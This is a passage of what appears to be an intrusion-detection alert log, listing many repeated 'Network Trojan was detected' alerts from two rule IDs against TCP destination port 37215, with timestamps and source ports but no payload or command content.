          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146262
          SID:2829579
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160355
          SID:2829579
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713340
          SID:2835222
          Source Port:51856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739701
          SID:2829579
          Source Port:42900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529946
          SID:2829579
          Source Port:36534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201269
          SID:2829579
          Source Port:41260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2835222
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865000
          SID:2835222
          Source Port:51174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065991
          SID:2835222
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202189
          SID:2835222
          Source Port:60104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330000
          SID:2829579
          Source Port:53802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112900
          SID:2835222
          Source Port:34654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.717262
          SID:2829579
          Source Port:58088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592104
          SID:2829579
          Source Port:38826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399953
          SID:2829579
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665393
          SID:2835222
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124585
          SID:2829579
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213316
          SID:2829579
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708894
          SID:2829579
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483181
          SID:2835222
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760208
          SID:2835222
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232682
          SID:2835222
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680331
          SID:2835222
          Source Port:60116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311116
          SID:2835222
          Source Port:42084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416334
          SID:2829579
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115626
          SID:2835222
          Source Port:55790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202231
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322909
          SID:2829579
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989084
          SID:2835222
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941534
          SID:2835222
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613845
          SID:2835222
          Source Port:53810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992354
          SID:2835222
          Source Port:44108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065373
          SID:2835222
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722411
          SID:2835222
          Source Port:49352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463480
          SID:2835222
          Source Port:48444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156186
          SID:2829579
          Source Port:42018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183712
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528335
          SID:2829579
          Source Port:50436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213530
          SID:2829579
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270329
          SID:2835222
          Source Port:39498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322295
          SID:2829579
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183099
          SID:2829579
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614144
          SID:2835222
          Source Port:39628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157515
          SID:2829579
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350503
          SID:2835222
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245275
          SID:2829579
          Source Port:40934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.118004
          SID:2835222
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560939
          SID:2835222
          Source Port:54680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729534
          SID:2829579
          Source Port:36532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671627
          SID:2829579
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176463
          SID:2835222
          Source Port:60322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472436
          SID:2829579
          Source Port:49876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336966
          SID:2835222
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161366
          SID:2835222
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201144
          SID:2829579
          Source Port:55302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742456
          SID:2829579
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626543
          SID:2829579
          Source Port:48850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553265
          SID:2835222
          Source Port:59014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852091
          SID:2835222
          Source Port:58244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848473
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848523
          SID:2835222
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325429
          SID:2829579
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890945
          SID:2829579
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271180
          SID:2835222
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008798
          SID:2835222
          Source Port:54612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848322
          SID:2835222
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.996380
          SID:2835222
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205461
          SID:2835222
          Source Port:48192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513105
          SID:2835222
          Source Port:38270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291671
          SID:2829579
          Source Port:59456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213964
          SID:2835222
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324105
          SID:2835222
          Source Port:56110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770725
          SID:2829579
          Source Port:36834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810038
          SID:2829579
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471114
          SID:2835222
          Source Port:49742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160700
          SID:2835222
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299569
          SID:2829579
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178530
          SID:2835222
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412129
          SID:2835222
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473196
          SID:2835222
          Source Port:43644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942271
          SID:2829579
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371504
          SID:2829579
          Source Port:39616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243618
          SID:2835222
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745831
          SID:2835222
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977900
          SID:2829579
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977190
          SID:2835222
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067334
          SID:2829579
          Source Port:55422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271903
          SID:2829579
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287607
          SID:2829579
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964371
          SID:2835222
          Source Port:50946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478315
          SID:2835222
          Source Port:59210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.050833
          SID:2835222
          Source Port:45984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891894
          SID:2829579
          Source Port:35394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152110
          SID:2835222
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124451
          SID:2829579
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095835
          SID:2829579
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923352
          SID:2829579
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840120
          SID:2829579
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849177
          SID:2835222
          Source Port:40872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944940
          SID:2829579
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213308
          SID:2835222
          Source Port:38450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623857
          SID:2835222
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794728
          SID:2829579
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767163
          SID:2835222
          Source Port:34204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209499
          SID:2829579
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325748
          SID:2835222
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223834
          SID:2835222
          Source Port:60800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742327
          SID:2835222
          Source Port:43082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607506
          SID:2829579
          Source Port:36758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816730
          SID:2835222
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232920
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678160
          SID:2829579
          Source Port:44076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247668
          SID:2835222
          Source Port:56958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689306
          SID:2829579
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839229
          SID:2829579
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285991
          SID:2835222
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400548
          SID:2829579
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195756
          SID:2829579
          Source Port:59580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324249
          SID:2829579
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422531
          SID:2835222
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838305
          SID:2835222
          Source Port:35552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728928
          SID:2829579
          Source Port:36132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709221
          SID:2835222
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976534
          SID:2835222
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301112
          SID:2829579
          Source Port:53900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595300
          SID:2835222
          Source Port:55154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554195
          SID:2829579
          Source Port:46604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.066241
          SID:2829579
          Source Port:34656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229924
          SID:2829579
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223347
          SID:2829579
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465175
          SID:2835222
          Source Port:41780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062182
          SID:2829579
          Source Port:50368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066086
          SID:2835222
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708451
          SID:2835222
          Source Port:44112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960751
          SID:2835222
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755942
          SID:2835222
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591880
          SID:2829579
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939584
          SID:2835222
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191714
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965184
          SID:2829579
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231637
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774007
          SID:2829579
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818402
          SID:2835222
          Source Port:39042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.856312
          SID:2835222
          Source Port:55454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711581
          SID:2835222
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593363
          SID:2829579
          Source Port:60150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736569
          SID:2829579
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977532
          SID:2829579
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843446
          SID:2829579
          Source Port:43598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298212
          SID:2829579
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183734
          SID:2829579
          Source Port:50768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678245
          SID:2835222
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.161544
          SID:2829579
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684975
          SID:2835222
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963128
          SID:2835222
          Source Port:44740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297323
          SID:2835222
          Source Port:59812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592239
          SID:2829579
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726977
          SID:2835222
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662928
          SID:2835222
          Source Port:43516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175453
          SID:2835222
          Source Port:37750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764030
          SID:2829579
          Source Port:42486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537737
          SID:2829579
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112866
          SID:2835222
          Source Port:46552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712197
          SID:2835222
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868545
          SID:2829579
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840371
          SID:2835222
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248054
          SID:2835222
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528836
          SID:2829579
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102380
          SID:2835222
          Source Port:38692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063091
          SID:2835222
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481312
          SID:2835222
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940961
          SID:2829579
          Source Port:39426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083854
          SID:2829579
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797786
          SID:2829579
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607512
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940990
          SID:2829579
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163857
          SID:2829579
          Source Port:38914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943271
          SID:2829579
          Source Port:51720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321010
          SID:2835222
          Source Port:38064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840486
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299554
          SID:2835222
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742401
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399826
          SID:2835222
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146087
          SID:2829579
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191852
          SID:2829579
          Source Port:43284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547472
          SID:2835222
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989675
          SID:2829579
          Source Port:49550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818624
          SID:2829579
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243228
          SID:2835222
          Source Port:50226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154602
          SID:2829579
          Source Port:48086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.649832
          SID:2835222
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939270
          SID:2829579
          Source Port:45846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116862
          SID:2829579
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178885
          SID:2835222
          Source Port:35702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800757
          SID:2835222
          Source Port:33746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593148
          SID:2829579
          Source Port:52244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529946
          SID:2835222
          Source Port:60726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
